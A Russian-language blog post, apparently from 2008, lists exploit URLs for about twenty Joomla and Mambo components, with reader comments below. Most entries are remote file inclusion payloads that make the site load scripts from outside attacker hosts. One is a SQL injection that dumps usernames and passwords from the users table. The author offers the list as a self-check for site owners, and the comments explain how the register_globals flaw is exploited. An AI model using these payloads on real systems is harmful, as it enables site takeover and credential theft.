Меня пытались поломать
Статья обновлена. Раньше тут был рассказ о том, что мол какие нехорошие арабы, что пытаются меня поломать. Но теперь тут я собираю уязвимости компонентов Joomla (по сути дыры безопасности). Каждая дыра сопровождается урлом ее использования. Предлагаю каждому владельцу сайта на Joomla обеспокоиться безопасностью своего сайта и проверить его на следующие способы взлома:
- Remository – /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://nawader.org/modules/Top/kgb.c?
- JoomlaBoard – /components/com_joomlaboard/file_upload.php?sbp=http://globizgroup.com/.img/dog.c?
- ExtCalendar – /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://globizgroup.com/.img/dog.c?
- NFN Address Book – /administrator/components/com_nfn_addressbook/nfnaddressbook.php?mosConfig_absolute_path=http://globizgroup.com/.img/dog.c?
- SWMenuPro – /components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://globizgroup.com/.img/dog.c?
- Mambo Gallery Manager – /administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://globizgroup.com/.img/dog.c?
- MosetsTree – /components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://globizgroup.com/.img/dog.c?
- Community Builder – /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://turinagyker.hu/.img/xQt.c?
- RSGallery2 – index.php?option=com_rsgallery2&Itemid=1&catid=1/**/union/**/select/**/null,null,username,null,password,null,null,null,null,null,null,null,null/**/from/**/jos_users/*
- mod_as_category – /modules/mod_as_category.php?mosConfig_absolute_path=http://62.129.173.149/img/dog.c?
- LoudMounth – /components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://62.129.173.149/img/dog.c?
- SMF – /administrator/components/com_smf/smf.php?mosConfig_absolute_path=http://62.129.173.149/img/dog.c?
- LinkDirectory – /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://62.129.173.149/img/dog.c?
- Lurm
- /administrator/components/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://62.129.173.149/img/dog.c?
- /components/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://62.129.173.149/img/dog.c?
- A6 MamboCredits – /administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://62.129.173.149/img/dog.c?
- VirtueMart – /components/com_virtuemart/inc/contact_type.php?mosConfig_absolute_path=http://62.129.173.149/img/dog.c?
- MamboBoard – /administrator/components/com_mamboboard/file_upload.php=http://62.129.173.149/img/dog.c?
- PC Cookbook – /components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://62.129.173.149/img/dog.c?
- MiniBB – /components/minibb/index.php?absolute_path=http://62.129.173.149/img/dog.c?
- PHPbb интегратор – /components/com_forum/download.php?phpbb_root_path=http://62.129.173.149/img/dog.c?
Joomla 1.5
- Ядро в бете – /libraries/pcl/pcltar.php?g_pcltar_lib_dir=http://www.yescolombia.com/as.c?
Комментарии [4]
Май 6, 21:26 , alex
А поподробней можно про то, как можно проверить. у меня при вызове этих урл, пишет Direct Access to this location is not allowed.
чего-то не понимаю как можно так взломать сайт-
Если так пишет, значит все в порядке. Тебя не поломать.
А взломать можно, щас просто лень искать уязвимые сайты, но они точно есть. Если включен register_globals + плохой код – можно подменить переменную, а от нее уже вычисляются все пути. В результате в скрипт можно внедрить свой файлик. И он будет выполнен как и все другие.
Июл 29, 13:41 , alexA
а мне при вводе url’а предлагает скачать пустые файлы smf.php или contact_type.php
Это хорошо или плохо?
-
А ты посмотри в эти файлы, если там есть подстрока _VALID_MOS, то значит все в порядке. Это что бы точно убедиться. А так да – если пусто, то все гуд.
2008-10-11 3:29 am , Оставьте свой отзыв
